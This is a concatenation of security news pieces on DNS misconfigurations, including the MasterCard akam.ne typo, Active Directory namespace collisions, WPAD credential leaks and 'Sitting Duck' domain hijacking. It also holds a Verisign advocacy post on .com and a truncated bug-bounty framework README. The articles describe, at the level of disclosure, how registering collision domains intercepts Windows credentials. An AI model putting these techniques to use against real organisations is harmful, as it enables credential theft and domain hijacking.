The payment card giant MasterCard just fixed a glaring error in its domain name server settings that could have allowed anyone to intercept or divert Internet traffic for the company by registering an unused domain name. The misconfiguration persisted for nearly five years until a security researcher spent $300 to register the domain and prevent it from being grabbed by cybercriminals.
A DNS lookup on the domain az.mastercard.com on Jan. 14, 2025 shows the mistyped domain name a22-65.akam.ne.
From June 30, 2020 until January 14, 2025, one of the core Internet servers that MasterCard uses to direct traffic for portions of the mastercard.com network was misnamed. MasterCard.com relies on five shared Domain Name System (DNS) servers at the Internet infrastructure provider Akamai [DNS acts as a kind of Internet phone book, by translating website names to numeric Internet addresses that are easier for computers to manage].
All of the Akamai DNS server names that MasterCard uses are supposed to end in “akam.net” but one of them was misconfigured to rely on the domain “akam.ne.”
This tiny but potentially critical typo was discovered recently by Philippe Caturegli, founder of the security consultancy Seralys. Caturegli said he guessed that nobody had yet registered the domain akam.ne, which is under the purview of the top-level domain authority for the West Africa nation of Niger.
Caturegli said it took $300 and nearly three months of waiting to secure the domain with the registry in Niger. After enabling a DNS server on akam.ne, he noticed hundreds of thousands of DNS requests hitting his server each day from locations around the globe. Apparently, MasterCard wasn’t the only organization that had fat-fingered a DNS entry to include “akam.ne,” but they were by far the largest.
Had he enabled an email server on his new domain akam.ne, Caturegli likely would have received wayward emails directed toward mastercard.com or other affected domains. If he’d abused his access, he probably could have obtained website encryption certificates (SSL/TLS certs) that were authorized to accept and relay web traffic for affected websites. He may even have been able to passively receive Microsoft Windows authentication credentials from employee computers at affected companies.
But the researcher said he didn’t attempt to do any of that. Instead, he alerted MasterCard that the domain was theirs if they wanted it, copying this author on his notifications. A few hours later, MasterCard acknowledged the mistake, but said there was never any real threat to the security of its operations.
“We have looked into the matter and there was not a risk to our systems,” a MasterCard spokesperson wrote. “This typo has now been corrected.”
Meanwhile, Caturegli received a request submitted through Bugcrowd, a program that offers financial rewards and recognition to security researchers who find flaws and work privately with the affected vendor to fix them. The message suggested his public disclosure of the MasterCard DNS error via a post on LinkedIn (after he’d secured the akam.ne domain) was not aligned with ethical security practices, and passed on a request from MasterCard to have the post removed.
MasterCard’s request to Caturegli, a.k.a. “Titon” on infosec.exchange.
Caturegli said while he does have an account on Bugcrowd, he has never submitted anything through the Bugcrowd program, and that he reported this issue directly to MasterCard.
“I did not disclose this issue through Bugcrowd,” Caturegli wrote in reply. “Before making any public disclosure, I ensured that the affected domain was registered to prevent exploitation, mitigating any risk to MasterCard or its customers. This action, which we took at our own expense, demonstrates our commitment to ethical security practices and responsible disclosure.”
Most organizations have at least two authoritative domain name servers, but some handle so many DNS requests that they need to spread the load over additional DNS server domains. In MasterCard’s case, that number is five, so it stands to reason that if an attacker managed to seize control over just one of those domains they would only be able to see about one-fifth of the overall DNS requests coming in.
But Caturegli said the reality is that many Internet users are relying at least to some degree on public traffic forwarders or DNS resolvers like Cloudflare and Google.
“So all we need is for one of these resolvers to query our name server and cache the result,” Caturegli said. By setting their DNS server records with a long TTL or “Time To Live” — a setting that can adjust the lifespan of data packets on a network — an attacker’s poisoned instructions for the target domain can be propagated by large cloud providers.
“With a long TTL, we may reroute a LOT more than just 1/5 of the traffic,” he said.
The researcher said he’d hoped that the credit card giant might thank him, or at least offer to cover the cost of buying the domain.
“We obviously disagree with this assessment,” Caturegli wrote in a follow-up post on LinkedIn regarding MasterCard’s public statement. “But we’ll let you judge— here are some of the DNS lookups we recorded before reporting the issue.”
Caturegli posted this screenshot of MasterCard domains that were potentially at risk from the misconfigured domain.
As the screenshot above shows, the misconfigured DNS server Caturegli found involved the MasterCard subdomain az.mastercard.com. It is not clear exactly how this subdomain is used by MasterCard, however their naming conventions suggest the domains correspond to production servers at Microsoft’s Azure cloud service. Caturegli said the domains all resolve to Internet addresses at Microsoft.
“Don’t be like Mastercard,” Caturegli concluded in his LinkedIn post. “Don’t dismiss risk, and don’t let your marketing team handle security disclosures.”
One final note: The domain akam.ne has been registered previously — in December 2016 by someone using the email address um-i-delo@yandex.ru. The Russian search giant Yandex reports this user account belongs to an “Ivan I.” from Moscow. Passive DNS records from DomainTools.com show that between 2016 and 2018 the domain was connected to an Internet server in Germany, and that the domain was left to expire in 2018.
This is interesting given a comment on Caturegli’s LinkedIn post from an ex-Cloudflare employee who linked to a report he co-authored on a similar typo domain apparently registered in 2017 for organizations that may have mistyped their AWS DNS server as “awsdns-06.ne” instead of “awsdns-06.net.” DomainTools reports that this typo domain also was registered to a Yandex user (playlotto@yandex.ru), and was hosted at the same German ISP — Team Internet (AS61969).
The proliferation of new top-level domains (TLDs) has exacerbated a well-known security weakness: Many organizations set up their internal Microsoft authentication systems years ago using domain names in TLDs that didn’t exist at the time. Meaning, they are continuously sending their Windows usernames and passwords to domain names they do not control and which are freely available for anyone to register. Here’s a look at one security researcher’s efforts to map and shrink the size of this insidious problem.
At issue is a well-known security and privacy threat called “namespace collision,” a situation where domain names intended to be used exclusively on an internal company network end up overlapping with domains that can resolve normally on the open Internet.
Windows computers on a private corporate network validate other things on that network using a Microsoft innovation called Active Directory, which is the umbrella term for a broad range of identity-related services in Windows environments. A core part of the way these things find each other involves a Windows feature called “DNS name devolution,” a kind of network shorthand that makes it easier to find other computers or servers without having to specify a full, legitimate domain name for those resources.
Consider the hypothetical private network internalnetwork.example.com: When an employee on this network wishes to access a shared drive called “drive1,” there’s no need to type “drive1.internalnetwork.example.com” into Windows Explorer; entering “\\drive1\” alone will suffice, and Windows takes care of the rest.
But problems can arise when an organization has built their Active Directory network on top of a domain they don’t own or control. While that may sound like a bonkers way to design a corporate authentication system, keep in mind that many organizations built their networks long before the introduction of hundreds of new top-level domains (TLDs), like .network, .inc, and .llc.
For example, a company in 2005 builds their Microsoft Active Directory service around the domain company.llc, perhaps reasoning that since .llc wasn’t even a routable TLD, the domain would simply fail to resolve if the organization’s Windows computers were ever used outside of its local network.
Alas, in 2018, the .llc TLD was born and began selling domains. From then on, anyone who registered company.llc would be able to passively intercept that organization’s Microsoft Windows credentials, or actively modify those connections in some way — such as redirecting them somewhere malicious.
Philippe Caturegli, founder of the security consultancy Seralys, is one of several researchers seeking to chart the size of the namespace collision problem. As a professional penetration tester, Caturegli has long exploited these collisions to attack specific targets that were paying to have their cyber defenses probed. But over the past year, Caturegli has been gradually mapping this vulnerability across the Internet by looking for clues that appear in self-signed security certificates (e.g. SSL/TLS certs).
Caturegli has been scanning the open Internet for self-signed certificates referencing domains in a variety of TLDs likely to appeal to businesses, including .ad, .associates, .center, .cloud, .consulting, .dev, .digital, .domains, .email, .global, .gmbh, .group, .holdings, .host, .inc, .institute, .international, .it, .llc, .ltd, .management, .ms, .name, .network, .security, .services, .site, .srl, .support, .systems, .tech, .university, .win and .zone, among others.
Seralys found certificates referencing more than 9,000 distinct domains across those TLDs. Their analysis determined many TLDs had far more exposed domains than others, and that about 20 percent of the domains they found ending .ad, .cloud and .group remain unregistered.
“The scale of the issue seems bigger than I initially anticipated,” Caturegli said in an interview with KrebsOnSecurity. “And while doing my research, I have also identified government entities (foreign and domestic), critical infrastructures, etc. that have such misconfigured assets.”
Some of the above-listed TLDs are not new and correspond to country-code TLDs, like .it for Italy, and .ad, the country-code TLD for the tiny nation of Andorra. Caturegli said many organizations no doubt viewed a domain ending in .ad as a convenient shorthand for an internal Active Directory setup, while being unaware or unworried that someone could actually register such a domain and intercept all of their Windows credentials and any unencrypted traffic.
When Caturegli discovered an encryption certificate being actively used for the domain memrtcc.ad, the domain was still available for registration. He then learned the .ad registry requires prospective customers to show a valid trademark for a domain before it can be registered.
Undeterred, Caturegli found a domain registrar that would sell him the domain for $160, and handle the trademark registration for another $500 (on subsequent .ad registrations, he located a company in Andorra that could process the trademark application for half that amount).
Caturegli said that immediately after setting up a DNS server for memrtcc.ad, he began receiving a flood of communications from hundreds of Microsoft Windows computers trying to authenticate to the domain. Each request contained a username and a hashed Windows password, and upon searching the usernames online Caturegli concluded they all belonged to police officers in Memphis, Tenn.
“It looks like all of the police cars there have a laptop in the cars, and they’re all attached to this memrtcc.ad domain that I now own,” Caturegli said, noting wryly that “memrtcc” stands for “Memphis Real-Time Crime Center.”
Caturegli said setting up an email server record for memrtcc.ad caused him to begin receiving automated messages from the police department’s IT help desk, including trouble tickets regarding the city’s Okta authentication system.
Mike Barlow, information security manager for the City of Memphis, confirmed the Memphis Police’s systems were sharing their Microsoft Windows credentials with the domain, and that the city was working with Caturegli to have the domain transferred to them.
“We are working with the Memphis Police Department to at least somewhat mitigate the issue in the meantime,” Barlow said.
Domain administrators have long been encouraged to use .local for internal domain names, because this TLD is reserved for use by local networks and cannot be routed over the open Internet. However, Caturegli said many organizations seem to have missed that memo and gotten things backwards — setting up their internal Active Directory structure around the perfectly routable domain local.ad.
Caturegli said he knows this because he “defensively” registered local.ad, which he said is currently used by multiple large organizations for Active Directory setups — including a European mobile phone provider, and the City of Newcastle in the United Kingdom.
Caturegli said he has now defensively registered a number of domains ending in .ad, such as internal.ad and schema.ad. But perhaps the most dangerous domain in his stable is wpad.ad. WPAD stands for Web Proxy Auto-Discovery Protocol, which is an ancient, on-by-default feature built into every version of Microsoft Windows that was designed to make it simpler for Windows computers to automatically find and download any proxy settings required by the local network.
Trouble is, any organization that chose a .ad domain they don’t own for their Active Directory setup will have a whole bunch of Microsoft systems constantly trying to reach out to wpad.ad if those machines have proxy automated detection enabled.
Security researchers have been beating up on WPAD for more than two decades now, warning time and again how it can be abused for nefarious ends. At this year’s DEF CON security conference in Las Vegas, for example, a researcher showed what happened after they registered the domain wpad.dk: Immediately after switching on the domain, they received a flood of WPAD requests from Microsoft Windows systems in Denmark that had namespace collisions in their Active Directory environments.
Image: Defcon.org.
For his part, Caturegli set up a server on wpad.ad to resolve and record the Internet address of any Windows systems trying to reach Microsoft Sharepoint servers, and saw that over one week it received more than 140,000 hits from hosts around the world attempting to connect.
The fundamental problem with WPAD is the same with Active Directory: Both are technologies originally designed to be used in closed, static, trusted office environments, and neither was built with today’s mobile devices or workforce in mind.
Probably one big reason organizations with potential namespace collision problems don’t fix them is that rebuilding one’s Active Directory infrastructure around a new domain name can be incredibly disruptive, costly, and risky, while the potential threat is considered comparatively low.
But Caturegli said ransomware gangs and other cybercrime groups could siphon huge volumes of Microsoft Windows credentials from quite a few companies with just a small up-front investment.
“It’s an easy way to gain that initial access without even having to launch an actual attack,” he said. “You just wait for the misconfigured workstation to connect to you and send you their credentials.”
If we ever learn that cybercrime groups are using namespace collisions to launch ransomware attacks, nobody can say they weren’t warned. Mike O’Connor, an early domain name investor who registered a number of choice domains such as bar.com, place.com and television.com, warned loudly and often back in 2013 that then-pending plans to add more than 1,000 new TLDs would massively expand the number of namespace collisions.
Mr. O’Connor’s most famous domain is corp.com, because for several decades he watched in horror as hundreds of thousands of Microsoft PCs continuously blasted his domain with credentials from organizations that had set up their Active Directory environment around the domain corp.com.
It turned out that Microsoft had actually used corp.com as an example of how one might set up Active Directory in some editions of Windows NT. Worse, some of the traffic going to corp.com was coming from Microsoft’s internal networks, indicating some part of Microsoft’s own internal infrastructure was misconfigured. When O’Connor said he was ready to sell corp.com to the highest bidder in 2020, Microsoft agreed to buy the domain for an undisclosed amount.
“I kind of imagine this problem to be something like a town [that] knowingly built a water supply out of lead pipes, or vendors of those projects who knew but didn’t tell their customers,” O’Connor told KrebsOnSecurity. “This is not an inadvertent thing like Y2K where everybody was surprised by what happened. People knew and didn’t care.”
Over the past several weeks, there has been significant discussion about Verisign and its management of the .com top-level domain (TLD) registry. Much of this discussion has been distorted by factual inaccuracies, a misunderstanding of core technical concepts, and misinterpretations regarding pricing, competition, and market dynamics in the domain name industry.
Billions of internet users and trillions of dollars in global commerce rely on the continuing security, stability, and resiliency of the .com TLD and the technical infrastructure that powers it, so it is vital that discussions about this topic be rooted in fact.
To set the record straight, we have collected and addressed the most common myths currently circulating about the .com TLD.
Myth: The technology that powers the .com TLD is not sophisticated.
Fact: Verisign has invested continuously for decades to build and evolve the infrastructure that powers the .com TLD, which is the most technically sophisticated of its kind. This infrastructure includes an advanced registration system, which reliably updates and maintains an accurate record of all registered .com domain names on a continuous basis, ensuring that millions of registry transactions are processed correctly, and millions of daily changes – including cryptographic updates to support Domain Name System Security Extensions (DNSSEC) – are distributed to a highly resilient global resolution constellation within seconds. This system ensures that users around the world maintain continuous, round-the-clock access to .com domain names and all the resources and services they support. Verisign has also played a vital role in the development and deployment of DNSSEC technology which uses cryptographic protections to ensure those connections are delivered with reliability and trust.
Verisign’s infrastructure processes an average of 329 billion Domain Name System (DNS) transactions each day, operating at a peak of more than six million transactions per second so far this year. Verisign’s resolution infrastructure is engineered to handle peak query loads significantly greater than the highest ever observed, to ensure continuous operation regardless of demand. This infrastructure has delivered 100 percent DNS availability for .com for more than 27 years without interruption. Verisign accomplishes this by operating a large, globally distributed registry operation, made up of hundreds of technical sites spread across 60+ nations on six continents. These sites run purpose-built technology invented by Verisign technologists for the unique demands of the .com TLD. Verisign engineers have developed specialized technologies and protocols that are designed to achieve higher availability and resiliency to prevent disruption. Examples of this design include employing network, system, and application-level diversification approaches such as using hardware from multiple vendors for network and data center operations and using multiple operating system providers to better withstand localized failures or single-threaded supplier issues. Using in-house purpose-built systems, as opposed to leveraging public cloud operations, lowers the risks of circular dependencies as most public cloud providers also rely on .com and the root infrastructure operated by Verisign. These approaches ensure diversity and redundancy for every component of .com operations.
Verisign is also tasked with defending against highly sophisticated and massive volumetric cyberattacks while managing ever-increasing global demand. Trillions of dollars in global commerce and billions of internet users depend on the availability of Verisign infrastructure 24/7. To defend .com against cyberattacks, including by highly sophisticated nation-state actors, Verisign employs a comprehensive enterprise risk management program and threat-driven defensive practices that drive continuous improvements to Verisign’s systems and programs. Verisign has operationalized the National Institute of Standards and Technology’s (NIST) Cybersecurity Framework and the Center for Internet Security’s (CIS) Critical Security Controls in the ongoing design and evolution of its infrastructure, with a security-first mindset. In addition, Verisign employs advanced information security measures such as continuous monitoring, real-time threat detection, ongoing vulnerability assessments, bug bounty programs, and rigorous security audits to safeguard its infrastructure.
Verisign’s infrastructure powers more than just .com. In addition to operating other TLDs, Verisign plays a unique role as Root Zone Maintainer and operator of two of the world’s 13 root servers, a critical function necessary for internet navigation. Hundreds of Verisign employees have developed highly specialized skills, honed over decades, to develop, maintain, and operate this unique global infrastructure. Verisign holds more than 500 patents for DNS and related technologies, and its innovations are deployed globally by other critical internet infrastructure operators. Verisign has made many of its critical DNS patents available on a royalty-free basis to the global DNS community and those technologies have been deployed around the world.
Myth: The annual wholesale price for .com domain names – $10.26 as of Sept. 1 – is much higher than market value and is harming consumers.
Fact: While other generic TLDs (gTLDs) do not share .com’s pricing transparency, the annual wholesale renewal price of a .com domain name is lower than 87 percent of the 448 gTLDs for which such data is available from registrars. Based on that data, some of the largest original gTLDs, which have been in the market for over 20 years, have renewal pricing of $9.93 (.org), $15.00 (.biz), and $17.50 (.info). Some of the largest new gTLDs, which have been in the market for over 10 years, have renewal pricing of $10 (.xyz – increasing to $11 by the end of September), $25.00 (.online), and $40.00 (.store). The available market data makes it clear that .com domain names are priced at or below market value. It is notable that competing TLDs have continued to grow market share while pricing their domain names over twice as high as .com domain names.
Customers of .com domain names are more likely to be affected by two factors outside of Verisign’s control: 1) the rising cost of retail registrations that are outpacing wholesale prices, with some registrars now charging more than double the wholesale price to renew a .com domain name; and 2) the unregulated secondary market, which accumulates large inventories of domain names and charges markups that are – in some cases – thousands of times higher than the regulated wholesale price.
Myth: Verisign spends an unusual amount on share repurchases and dividends at the expense of infrastructure investment.
Fact: Verisign’s technological infrastructure is unmatched in the DNS industry for its scale, technical diversity, security, and resiliency. Verisign has invested for years to evolve and harden that technology, a fact illustrated by the company’s 27-year DNS uptime record. During the 2000s, Verisign offered a number of DNS-related services, including distributed denial-of-service (DDoS) attack mitigation and managed DNS. Significant capacity was added during that period. In 2018, when Verisign divested the last of its non-core businesses to focus on .com and other DNS operations, the company not only maintained, but increased capacity in order to meet growing DNS demand as well as to address growing DDoS volumetric attacks.
Verisign is certainly a profitable company and is proud of its operational success and history of sound financial management, which are important factors in maintaining the security, stability, and resiliency of the DNS. Some critics have singled out Verisign’s methods of increasing shareholder value, a duty of all public companies. Verisign has fulfilled this duty in part through share repurchases and dividends, which benefit a large and diverse group of shareholders including individuals, public employee retirement systems, index funds, and mutual funds (benefiting their millions of investors). Less than one percent of Verisign’s shares are held by company officers and directors.
Verisign’s return of capital practices are well in line with those of other successful public companies. In 2023, more than 90 percent of S&P 500 companies returned capital to shareholders and Verisign ranked 216th out of the S&P 500 in terms of cash returned to shareholders as a percentage of market capitalization. In terms of profitability, market expectation of Verisign’s earnings per share (a reliable measure of profitability) is $8.36 for the next 12 months, which places it 198th in the S&P 500.
Verisign’s sound and transparent financial management underpins its successful management of the .com TLD and other key internet infrastructure. Verisign has been a public company for 26 years and an S&P 500 company for 18 years. As a publicly listed company operating critical internet infrastructure, the public and the DNS ecosystem benefit from Verisign’s transparency in its operating and financial results, which must comply with the SEC’s disclosure rules and regulations for public companies. Verisign’s financial statements must also undergo an independent audit each year. By contrast, many other registries, registrars, and resellers, including some who focus on the secondary market, serve only the narrow interests of their private owners and do so with no obligations surrounding public disclosure or transparency of their ownership, profitability, operations, or otherwise. Adding obligations for these entities to report ownership, profitability, and other metrics to The Internet Corporation for Assigned Names and Numbers (ICANN) and the public would benefit the entire DNS ecosystem.
Myth: Contracts to operate gTLD registries should be routinely rebid, and a presumptive right of renewal for such contracts is bad for consumers and the internet.
Fact: The National Telecommunications and Information Administration (NTIA) recently opined that “The security, stability, and resilience of the Internet’s unique identifier systems is of paramount importance…” This position is shared by Verisign and the majority of participants in the global multistakeholder system of internet governance. ICANN has supported and clarified this priority and the role it plays in registry contracts. The contracts for .com and all other gTLDs reflect this priority (i.e., that stability and predictability in registry operations leads to long-term investments by operators). Verisign’s right to renew its .com Registry Agreement is conditioned on meeting rigorous technical and operational requirements to ensure .com’s continued security, stability, and continuous availability to billions of internet users. This contractual approach encourages gTLD operators to invest in infrastructure to support rising demand and defend against cyberattacks. Due to its investments, Verisign has operated .com with 100 percent DNS uptime for over 27 years.
Myth: Verisign’s operation of .com constitutes a “monopoly.”
Fact: There are nearly 1,200 gTLDs, and more than 250 country-code TLDs (ccTLDs), operating today. Each of these TLDs offer the same core functionality, allowing users to establish and maintain an online presence, establish websites, and create email addresses. Globally, there are over 362 million registered domain names – the majority of which are registered in TLDs not operated by Verisign. The number of domain names registered in non-Verisign operated gTLDs and ccTLDs has grown consistently as those TLDs have grown their share of the marketplace. In addition to this competition at the wholesale level, there are more than 2,800 ICANN-accredited registrars, and thousands more resellers, offering domain names at a range of prices and in a range of packages to consumers.
Further, from a practical perspective, the technical nature of TLD registries requires that they each be run by a single operator, but with so many operators in the marketplace, consumers have a broad and diverse array of choices at a range of prices. Other TLDs like .org, .shop, .ai, and .uk are not “monopolies” and neither is .com.
Myth: Verisign sets .com domain name prices for consumers.
Fact: Domain name registrars set unregulated retail prices for .com domain names, and those prices vary widely among the 2,800 ICANN-accredited registrars and associated resellers. Some registrars charge more than double the annual wholesale price for .com domain name renewals, and, in many cases, those price increases have outpaced Verisign’s tightly regulated .com wholesale price increases. In analyzing registrar pricing, it is important to distinguish introductory offers – which are often set lower to attract new customers – from renewal prices, which is what registrars charge existing customers to maintain their domain name registrations.
In addition to the retail registrar market, there is also a multibillion-dollar secondary market for domain names, in which domain investors, or “domainers,” accumulate millions of desirable domain names in order to resell them at markups that can be thousands of times higher than Verisign’s regulated wholesale prices. The gap between wholesale prices and secondary market prices makes it possible for domainers to hold names for years – making them prohibitively expensive to the general public. The profitability of the secondary market has also attracted successful retail registrars to expand into it, acquiring large portfolios of .com domain names and creating auction sites where they are sold well above retail prices. A blog that reports on high-profile domain name sales reported that just one reselling site handled $90 million in secondary sales in the second quarter of 2024 alone. Although the secondary marketplace may serve a function within the DNS ecosystem, it is completely unregulated.
Myth: The U.S. Government lifted price caps on .com domain names in 2018.
Fact: Amendment 35 to the Cooperative Agreement retained wholesale price restrictions in the .com TLD, while also retaining legacy regulations prohibiting Verisign from operating as a registrar in the .com TLD. Of the nearly 1,200 gTLDs overseen by ICANN and the global multistakeholder community, .com, .net, and .name (also operated by Verisign) remain the only three that are governed by maximum price restrictions. Those restrictions remain in place today and will remain in place after the .com Registry Agreement is renewed later this year.
The post Setting the Record Straight – Myths vs. Facts about .com appeared first on Verisign Blog.
More than a million domain names — including many registered by Fortune 100 firms and brand protection companies — are vulnerable to takeover by cybercriminals thanks to authentication weaknesses at a number of large web hosting providers and domain registrars, new research finds.
Image: Shutterstock.
Your Web browser knows how to find a site like example.com thanks to the global Domain Name System (DNS), which serves as a kind of phone book for the Internet by translating human-friendly website names (example.com) into numeric Internet addresses.
When someone registers a domain name, the registrar will typically provide two sets of DNS records that the customer then needs to assign to their domain. Those records are crucial because they allow Web browsers to find the Internet address of the hosting provider that is serving that domain.
But potential problems can arise when a domain’s DNS records are “lame,” meaning the authoritative name server does not have enough information about the domain and can’t resolve queries to find it. A domain can become lame in a variety of ways, such as when it is not assigned an Internet address, or because the name servers in the domain’s authoritative record are misconfigured or missing.
The reason lame domains are problematic is that a number of Web hosting and DNS providers allow users to claim control over a domain without accessing the true owner’s account at their DNS provider or registrar.
If this threat sounds familiar, that’s because it is hardly new. Back in 2019, KrebsOnSecurity wrote about thieves employing this method to seize control over thousands of domains registered at GoDaddy, and using those to send bomb threats and sextortion emails (GoDaddy says they fixed that weakness in their systems not long after that 2019 story).
In the 2019 campaign, the spammers created accounts on GoDaddy and were able to take over vulnerable domains simply by registering a free account at GoDaddy and being assigned the same DNS servers as the hijacked domain.
Three years before that, the same pervasive weakness was described in a blog post by security researcher Matthew Bryant, who showed how one could commandeer at least 120,000 domains via DNS weaknesses at some of the world’s largest hosting providers.
Incredibly, new research jointly released today by security experts at Infoblox and Eclypsium finds this same authentication weakness is still present at a number of large hosting and DNS providers.
“It’s easy to exploit, very hard to detect, and it’s entirely preventable,” said Dave Mitchell, principal threat researcher at Infoblox. “Free services make it easier [to exploit] at scale. And the bulk of these are at a handful of DNS providers.”
Infoblox’s report found there are multiple cybercriminal groups abusing these stolen domains as a globally dispersed “traffic distribution system,” which can be used to mask the true source or destination of web traffic and to funnel Web users to malicious or phishous websites.
Commandeering domains this way also can allow thieves to impersonate trusted brands and abuse their positive or at least neutral reputation when sending email from those domains, as we saw in 2019 with the GoDaddy attacks.
“Hijacked domains have been used directly in phishing attacks and scams, as well as large spam systems,” reads the Infoblox report, which refers to lame domains as “Sitting Ducks.” “There is evidence that some domains were used for Cobalt Strike and other malware command and control (C2). Other attacks have used hijacked domains in targeted phishing attacks by creating lookalike subdomains. A few actors have stockpiled hijacked domains for an unknown purpose.”
Eclypsium researchers estimate there are currently about one million Sitting Duck domains, and that at least 30,000 of them have been hijacked for malicious use since 2019.
“As of the time of writing, numerous DNS providers enable this through weak or nonexistent verification of domain ownership for a given account,” Eclypsium wrote.
The security firms said they found a number of compromised Sitting Duck domains were originally registered by brand protection companies that specialize in defensive domain registrations (reserving look-alike domains for top brands before those names can be grabbed by scammers) and combating trademark infringement.
For example, Infoblox found cybercriminal groups using a Sitting Duck domain called clickermediacorp[.]com, which was a CBS Interactive Inc. domain initially registered in 2009 at GoDaddy. However, in 2010 the DNS was updated to DNSMadeEasy.com servers, and in 2012 the domain was transferred to MarkMonitor.
Another hijacked Sitting Duck domain — anti-phishing[.]org — was registered in 2003 by the Anti-Phishing Working Group (APWG), a cybersecurity not-for-profit organization that closely tracks phishing attacks.
In many cases, the researchers discovered Sitting Duck domains that appear to have been configured to auto-renew at the registrar, but the authoritative DNS or hosting services were not renewed.
The researchers say Sitting Duck domains all possess three attributes that makes them vulnerable to takeover:
1) the domain uses or delegates authoritative DNS services to a different provider than the domain registrar;
2) the authoritative name server(s) for the domain does not have information about the Internet address the domain should point to;
3) the authoritative DNS provider is “exploitable,” i.e. an attacker can claim the domain at the provider and set up DNS records without access to the valid domain owner’s account at the domain registrar.
Image: Infoblox.
How does one know whether a DNS provider is exploitable? There is a frequently updated list published on GitHub called “Can I take over DNS,” which has been documenting exploitability by DNS provider over the past several years. The list includes examples for each of the named DNS providers.
In the case of the aforementioned Sitting Duck domain clickermediacorp[.]com, the domain appears to have been hijacked by scammers by claiming it at the web hosting firm DNSMadeEasy, which is owned by Digicert, one of the industry’s largest issuers of digital certificates (SSL/TLS certificates).
In an interview with KrebsOnSecurity, DNSMadeEasy founder and senior vice president Steve Job said the problem isn’t really his company’s to solve, noting that DNS providers who are also not domain registrars have no real way of validating whether a given customer legitimately owns the domain being claimed.
“We do shut down abusive accounts when we find them,” Job said. “But it’s my belief that the onus needs to be on the [domain registrants] themselves. If you’re going to buy something and point it somewhere you have no control over, we can’t prevent that.”
Infoblox, Eclypsium, and the DNS wiki listing at Github all say that web hosting giant Digital Ocean is among the vulnerable hosting firms. In response to questions, Digital Ocean said it was exploring options for mitigating such activity.
“The DigitalOcean DNS service is not authoritative, and we are not a domain registrar,” Digital Ocean wrote in an emailed response. “Where a domain owner has delegated authority to our DNS infrastructure with their registrar, and they have allowed their ownership of that DNS record in our infrastructure to lapse, that becomes a ‘lame delegation’ under this hijack model. We believe the root cause, ultimately, is poor management of domain name configuration by the owner, akin to leaving your keys in your unlocked car, but we acknowledge the opportunity to adjust our non-authoritative DNS service guardrails in an effort to help minimize the impact of a lapse in hygiene at the authoritative DNS level. We’re connected with the research teams to explore additional mitigation options.”
In a statement provided to KrebsOnSecurity, the hosting provider and registrar Hostinger said they were working to implement a solution to prevent lame duck attacks in the “upcoming weeks.”
“We are working on implementing an SOA-based domain verification system,” Hostinger wrote. “Custom nameservers with a Start of Authority (SOA) record will be used to verify whether the domain truly belongs to the customer. We aim to launch this user-friendly solution by the end of August. The final step is to deprecate preview domains, a functionality sometimes used by customers with malicious intents. Preview domains will be deprecated by the end of September. Legitimate users will be able to use randomly generated temporary subdomains instead.”
What did DNS providers that have struggled with this issue in the past do to address these authentication challenges? The security firms said that to claim a domain name, the best practice providers gave the account holder random name servers that required a change at the registrar before the domains could go live. They also found the best practice providers used various mechanisms to ensure that the newly assigned name server hosts did not match previous name server assignments.
[Side note: Infoblox observed that many of the hijacked domains were being hosted at Stark Industries Solutions, a sprawling hosting provider that appeared two weeks before Russia invaded Ukraine and has become the epicenter of countless cyberattacks against enemies of Russia].
Both Infoblox and Eclypsium said that without more cooperation and less finger-pointing by all stakeholders in the global DNS, attacks on sitting duck domains will continue to rise, with domain registrants and regular Internet users caught in the middle.
“Government organizations, regulators, and standards bodies should consider long-term solutions to vulnerabilities in the DNS management attack surface,” the Infoblox report concludes.
Howdy! My name is Harrison Richardson, or rs0n
(arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.
The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make 💰 doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.
In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py
or slowburn.py
) is basically an algorithm that runs the Modules (Ex: fire-starter.py
or fire-scanner.py
) in a specific patter for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.
My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!
Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:
sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.
Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.3. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.
./install.sh
This video shows exactly what to expect from a successful installation.
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./install.sh --arm
You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys
directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.
Once the installation is complete, you will be given the option to run the application by entering Y
. If you choose not the run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directly and run the run.sh
bash script.
./run.sh
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./run.sh --arm
The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.
